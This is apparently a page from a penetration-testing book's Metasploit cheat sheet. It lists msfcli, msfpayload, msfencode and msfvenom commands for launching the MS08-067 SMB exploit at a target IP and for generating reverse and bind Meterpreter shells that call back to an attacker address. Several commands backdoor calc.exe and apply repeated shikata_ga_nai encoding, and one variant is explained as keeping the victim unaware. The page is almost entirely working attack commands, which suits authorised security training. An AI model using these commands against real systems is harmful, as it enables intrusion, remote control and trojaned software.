background image

Cheat Sheet

281

MSFcli Commands

msfcli | grep exploit

Show only exploits.

msfcli | grep exploit/windows

Show only Windows exploits.

msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp 

LPORT=443 RHOST=172.16.32.142 E

Launch 

ms08_067_netapi

 exploit at 172.16.32.142 with a 

bind_tcp

 payload 

being delivered to listen on port 443.

MSF, Ninja, Fu

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R | 

msfencode -x calc.exe -k -o payload.exe -e x86/shikata_ga_nai -c 7 -t exe

Create a reverse Meterpreter payload connecting back to 192.168.1.5 
on port 443 using 

calc.exe

 as a template to backdoor. Keep execution 

flow within the application for it to continue to work, and output the 

shikata_ga_nai

 encoded payload to 

payload.exe

.

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R | 

msfencode -x calc.exe -o payload.exe -e x86/shikata_ga_nai -c 7 -t exe

Create a reverse Meterpreter payload connecting back to 192.168.1.5 on 
port 443 using 

calc.exe

 as a template to backdoor. Does not keep execu-

tion flow within the application and will not prompt anything back to the 
end user when it is executed. This is useful when you have remote access 
via a browser exploit and don’t want the calculator application popping 
up to the end user. Also outputs the 

shikata_ga_nai

 encoded payload to 

payload.exe

.

msfpayload windows/meterpreter/bind_tcp LPORT=443 R | msfencode -o payload.exe 

-e x86/shikata_ga_nai -c 7 -t exe && msfcli multi/handler PAYLOAD=windows/
meterpreter/bind_tcp LPORT=443 E

Create a 

bind_tcp

 Meterpreter payload in raw format, encode it seven 

times using 

shikata_ga_nai

, output it in Windows portable executable for-

mat with a name of 

payload.exe

, and then have a multi-handler listening 

for it to execute.

MSFvenom

Leverage 

msfvenom

, an all-in-one suite, to create and encode your payload:

msfvenom --payload

windows/meterpreter/reverse_tcp --format exe --encoder x86/shikata_ga_nai 

LHOST=172.16.1.32 LPORT=443 > msf.exe

[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
root@bt://opt/framework3/msf3#

This one liner will create a payload and automatically generate it in an 

executable format.